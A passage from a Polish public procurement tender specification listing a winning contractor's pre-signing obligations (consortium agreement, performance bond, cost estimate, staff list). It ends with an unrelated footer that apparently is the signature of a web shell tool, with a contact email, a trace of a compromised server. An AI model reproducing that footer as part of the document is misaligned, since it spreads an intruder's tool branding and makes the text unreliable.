najkorzystniejszą, będzie zobowiązany zawrzeć umowę w sprawie<br/>zamówienia na warunkach określonych w projektowanych postanowieniach umowy, które stanowią załącznik nr 12 do SWZ.<br/>Umowa zostanie uzupełniona o zapisy wynikające ze złożonej oferty.<br/>19.5. Wykonawca, przed podpisaniem umowy, powinien przedłożyć:<br/>- w przypadku konsorcjum lub spółki cywilnej - umowę regulującą współpracę Wykonawców działających wspólnie (umowa<br/>konsorcjum lub umowa spółki cywilnej).<br/>19.6. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego, Zamawiający może dokonać ponownego badania i oceny ofert spośród ofert pozostałych w<br/>postępowaniu wykonawców albo unieważnić postępowanie (art. 263 ustawy Pzp).<br/>19.7. Wykonawca, którego oferta została wybrana jako najkorzystniejsza, zostanie poinformowany przez zamawiającego o<br/>miejscu i terminie podpisania umowy.<br/>19.8. Najpóźniej w dniu podpisania umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu:<br/> zabezpieczenie należytego wykonania umowy,<br/> kosztorys ofertowy,<br/> wykaz osób oddelegowanych do realizacji zamówienia,<br/> w przypadku wykonawców występujących wspólnie – kopię umowy regulującej współpracę tych Wykonawców zawierającą<br/>w swojej treści następujące postanowienia:<br/> sposób ich współdziałania,<br/> zakres czynności powierzonych do wykonania każdemu z nich,<br/> numer i nazwę rachunku bankowego, na który będą dokonywane płatności z tytułu realizacji kontraktu,<br/> solidarną odpowiedzialność za wykonanie zamówienia,<br/> wskazanie, że jeden z Wykonawców jest upoważniony do zaciągania zobowiązań i do przyjmowania instrukcji na rzecz i w<br/>imieniu wszystkich Wykonawców razem i każdego z osobna oraz do przyjmowania płatności od Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com